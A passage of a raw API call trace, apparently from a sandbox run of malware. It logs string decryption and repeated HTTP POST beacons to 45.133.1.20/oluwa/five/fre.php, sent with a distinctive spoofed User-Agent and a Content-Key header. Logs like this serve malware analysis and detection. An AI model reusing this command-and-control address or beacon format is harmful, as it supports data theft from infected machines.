lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0228.035] GetProcessHeap () returned 0x6a0000 [0228.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0228.036] GetProcessHeap () returned 0x6a0000 [0228.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0228.036] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xab0) returned 0x6d4 [0228.038] Sleep (dwMilliseconds=0xea60) [0228.039] GetProcessHeap () returned 0x6a0000 [0228.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0228.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.041] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.048] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0228.060] GetProcessHeap () returned 0x6a0000 [0228.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0228.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.061] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0228.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.079] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.080] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.080] GetProcessHeap () returned 0x6a0000 [0228.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0228.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.082] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0228.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.083] CryptDestroyKey (hKey=0x6ad060) returned 1 [0228.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.084] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0228.084] GetProcessHeap () returned 0x6a0000 [0228.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0228.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.086] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0228.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.091] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0228.092] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.093] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0228.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.094] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0228.094] GetProcessHeap () returned 0x6a0000 [0228.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0228.094] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0228.094] GetProcessHeap () returned 0x6a0000 [0228.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0228.095] GetProcessHeap () returned 0x6a0000 [0228.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0228.095] GetProcessHeap () returned 0x6a0000 [0228.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0228.096] GetProcessHeap () returned 0x6a0000 [0228.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0228.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.099] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.157] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0228.175] GetProcessHeap () returned 0x6a0000 [0228.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0228.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.176] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0228.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.177] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.178] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.178] GetProcessHeap () returned 0x6a0000 [0228.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0228.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.179] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0228.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.180] CryptDestroyKey (hKey=0x6ad020) returned 1 [0228.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.181] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0228.181] GetProcessHeap () returned 0x6a0000 [0228.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0228.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.182] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0228.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.183] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0228.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.184] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0228.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.187] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0228.187] GetProcessHeap () returned 0x6a0000 [0228.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0228.187] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0228.188] GetProcessHeap () returned 0x6a0000 [0228.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0228.188] socket (af=2, type=1, protocol=6) returned 0x6d8 [0228.188] connect (s=0x6d8, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0228.213] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0228.213] GetProcessHeap () returned 0x6a0000 [0228.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0228.213] GetProcessHeap () returned 0x6a0000 [0228.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0228.214] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0228.215] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0228.215] GetProcessHeap () returned 0x6a0000 [0228.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d9e40 [0228.216] GetProcessHeap () returned 0x6a0000 [0228.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0228.216] GetProcessHeap () returned 0x6a0000 [0228.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0228.217] GetProcessHeap () returned 0x6a0000 [0228.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0228.220] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0228.221] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0228.221] GetProcessHeap () returned 0x6a0000 [0228.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0228.221] GetProcessHeap () returned 0x6a0000 [0228.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0228.222] send (s=0x6d8, buf=0x6bd460*, len=242, flags=0) returned 242 [0228.222] send (s=0x6d8, buf=0x6bb998*, len=159, flags=0) returned 159 [0228.222] GetProcessHeap () returned 0x6a0000 [0228.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0228.223] recv (in: s=0x6d8, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0228.300] GetProcessHeap () returned 0x6a0000 [0228.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0228.301] GetProcessHeap () returned 0x6a0000 [0228.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0228.302] GetProcessHeap () returned 0x6a0000 [0228.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9e40 | out: hHeap=0x6a0000) returned 1 [0228.302] GetProcessHeap () returned 0x6a0000 [0228.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0228.303] closesocket (s=0x6d8) returned 0 [0228.303] GetProcessHeap () returned 0x6a0000 [0228.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0228.303] GetProcessHeap () returned 0x6a0000 [0228.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0228.304] GetProcessHeap () returned 0x6a0000 [0228.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0228.304] GetProcessHeap () returned 0x6a0000 [0228.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0228.304] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfac) returned 0x6d8 [0228.306] Sleep (dwMilliseconds=0xea60) [0228.309] GetProcessHeap () returned 0x6a0000 [0228.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0228.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.310] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.318] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0228.344] GetProcessHeap () returned 0x6a0000 [0228.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8e30 [0228.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.345] CryptImportKey (in: hProv=0x6bef48, pbData=0x6d8e30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0228.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.346] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.347] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.347] GetProcessHeap () returned 0x6a0000 [0228.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8e30 | out: hHeap=0x6a0000) returned 1 [0228.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.352] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0228.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.353] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0228.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.354] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0228.354] GetProcessHeap () returned 0x6a0000 [0228.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0228.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.355] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0228.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.441] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0228.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.443] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0228.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.444] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0228.444] GetProcessHeap () returned 0x6a0000 [0228.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0228.444] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0228.444] GetProcessHeap () returned 0x6a0000 [0228.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0228.445] GetProcessHeap () returned 0x6a0000 [0228.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0228.445] GetProcessHeap () returned 0x6a0000 [0228.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0228.446] GetProcessHeap () returned 0x6a0000 [0228.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0228.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.447] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.457] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0228.466] GetProcessHeap () returned 0x6a0000 [0228.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0228.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.468] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0228.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.469] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.470] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.470] GetProcessHeap () returned 0x6a0000 [0228.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0228.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.472] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0228.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.478] CryptDestroyKey (hKey=0x6ad020) returned 1 [0228.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.480] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0228.480] GetProcessHeap () returned 0x6a0000 [0228.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0228.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.481] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0228.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.482] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0228.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.484] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0228.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.485] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0228.487] GetProcessHeap () returned 0x6a0000 [0228.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0228.487] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0228.487] GetProcessHeap () returned 0x6a0000 [0228.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0228.487] socket (af=2, type=1, protocol=6) returned 0x6dc [0228.488] connect (s=0x6dc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0228.521] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0228.534] GetProcessHeap () returned 0x6a0000 [0228.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0228.535] GetProcessHeap () returned 0x6a0000 [0228.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0228.535] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0228.537] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0228.537] GetProcessHeap () returned 0x6a0000 [0228.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d9a80 [0228.537] GetProcessHeap () returned 0x6a0000 [0228.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0228.537] GetProcessHeap () returned 0x6a0000 [0228.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0228.537] GetProcessHeap () returned 0x6a0000 [0228.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0228.538] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0228.540] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0228.540] GetProcessHeap () returned 0x6a0000 [0228.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0228.540] GetProcessHeap () returned 0x6a0000 [0228.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0228.540] send (s=0x6dc, buf=0x6bd460*, len=242, flags=0) returned 242 [0228.545] send (s=0x6dc, buf=0x6bb998*, len=159, flags=0) returned 159 [0228.545] GetProcessHeap () returned 0x6a0000 [0228.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0228.545] recv (in: s=0x6dc, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0228.612] GetProcessHeap () returned 0x6a0000 [0228.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0228.614] GetProcessHeap () returned 0x6a0000 [0228.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0228.615] GetProcessHeap () returned 0x6a0000 [0228.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9a80 | out: hHeap=0x6a0000) returned 1 [0228.615] GetProcessHeap () returned 0x6a0000 [0228.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0228.615] closesocket (s=0x6dc) returned 0 [0228.617] GetProcessHeap () returned 0x6a0000 [0228.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0228.617] GetProcessHeap () returned 0x6a0000 [0228.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0228.617] GetProcessHeap () returned 0x6a0000 [0228.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0228.618] GetProcessHeap () returned 0x6a0000 [0228.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0228.619] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13e8) returned 0x6dc [0228.625] Sleep (dwMilliseconds=0xea60) [0228.627] GetProcessHeap () returned 0x6a0000 [0228.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0228.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.629] CryptAcquireContextW (in: phProv=0x19fca8, 